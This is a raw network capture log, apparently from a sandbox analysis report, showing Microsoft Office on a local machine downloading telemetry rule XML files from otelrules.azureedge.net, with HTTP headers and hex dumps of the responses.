                                                                                                                                                                2024-11-23 19:37:01 UTC148INData Raw: 42 61 64 20 52 65 71 75 65 73 74 0a 45 72 72 6f 72 20 55 70 67 72 61 64 69 6e 67 20 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 77 65 62 73 6f 63 6b 65 74 3a 20 74 68 65 20 63 6c 69 65 6e 74 20 69 73 20 6e 6f 74 20 75 73 69 6e 67 20 74 68 65 20 77 65 62 73 6f 63 6b 65 74 20 70 72 6f 74 6f 63 6f 6c 3a 20 27 75 70 67 72 61 64 65 27 20 74 6f 6b 65 6e 20 6e 6f 74 20 66 6f 75 6e 64 20 69 6e 20 27 43 6f 6e 6e 65 63 74 69 6f 6e 27 20 68 65 61 64 65 72 0a
                                                                                                                                                                Data Ascii: Bad RequestError Upgrading Connection: websocket: the client is not using the websocket protocol: 'upgrade' token not found in 'Connection' header


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                72192.168.2.44982713.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:37:02 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:37:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:37:02 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 479
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                ETag: "0x8DC582B989EE75B"
                                                                                                                                                                x-ms-request-id: f47ed088-401e-0029-7f4d-3c9b43000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193702Z-15b8b599d882hxlwhC1TEBfa5w00000003bg000000003c5d
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                2024-11-23 19:37:02 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                73192.168.2.44982813.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:37:02 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:37:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:37:02 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 415
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                x-ms-request-id: 12647bc5-a01e-0070-6743-3d573b000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193702Z-178bfbc474bw8bwphC1NYC38b400000004n000000000p4yn
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                2024-11-23 19:37:02 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                74192.168.2.44982913.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:37:02 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:37:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:37:02 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 471
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                ETag: "0x8DC582B97E6FCDD"
                                                                                                                                                                x-ms-request-id: b6ecb1ee-501e-008f-3044-3c9054000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193702Z-15b8b599d889gj5whC1TEBfyk00000000380000000005vkf
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                2024-11-23 19:37:02 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                75192.168.2.44983013.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:37:02 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:37:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:37:02 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 419
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                ETag: "0x8DC582B9C710B28"
                                                                                                                                                                x-ms-request-id: 7511da03-801e-0083-3b8c-3af0ae000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193702Z-15b8b599d88tmlzshC1TEB4xpn00000003ag0000000056mc
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                2024-11-23 19:37:02 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                76192.168.2.44983113.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:37:02 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:37:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:37:03 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 477
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                                                                ETag: "0x8DC582BA54DCC28"
                                                                                                                                                                x-ms-request-id: 25a1d219-c01e-007a-1943-3cb877000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193703Z-178bfbc474bpnd5vhC1NYC4vr400000004yg000000006y0f
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                2024-11-23 19:37:03 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                77192.168.2.44983213.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:37:04 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:37:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:37:04 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 419
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                ETag: "0x8DC582BB7F164C3"
                                                                                                                                                                x-ms-request-id: 90758f84-b01e-0021-4c46-3ccab7000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193704Z-178bfbc474bmqmgjhC1NYCy16c00000005200000000038yu
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                2024-11-23 19:37:05 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                78192.168.2.44983413.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:37:04 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:37:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:37:05 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 419
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                                                                ETag: "0x8DC582B9FF95F80"
                                                                                                                                                                x-ms-request-id: abcc4943-b01e-00ab-2315-3ddafd000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193705Z-178bfbc474bwlrhlhC1NYCy3kg00000004z00000000050f8
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                2024-11-23 19:37:05 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                79192.168.2.44983313.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:37:04 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:37:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:37:05 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 477
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                                                                ETag: "0x8DC582BA48B5BDD"
                                                                                                                                                                x-ms-request-id: 449238ea-501e-0029-7d7c-3bd0b8000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193705Z-174c587ffdfks6tlhC1TEBeza400000003ag00000000rzt9
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                2024-11-23 19:37:05 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                80192.168.2.44983513.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:37:04 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:37:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:37:05 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 472
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                                                                ETag: "0x8DC582BB650C2EC"
                                                                                                                                                                x-ms-request-id: 5304f1e1-001e-005a-6c6b-3bc3d0000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193705Z-178bfbc474bq2pr7hC1NYCkfgg00000004yg00000000htrr
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                2024-11-23 19:37:05 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                81192.168.2.44983613.107.246.63443
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-11-23 19:37:05 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                2024-11-23 19:37:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:37:05 GMT
                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                Content-Length: 468
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                ETag: "0x8DC582BB3EAF226"
                                                                                                                                                                x-ms-request-id: 3585b350-301e-005d-097c-3be448000000
                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                x-azure-ref: 20241123T193705Z-178bfbc474brk967hC1NYCfu6000000004kg00000000q4ku
                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                Accept-Ranges: bytes
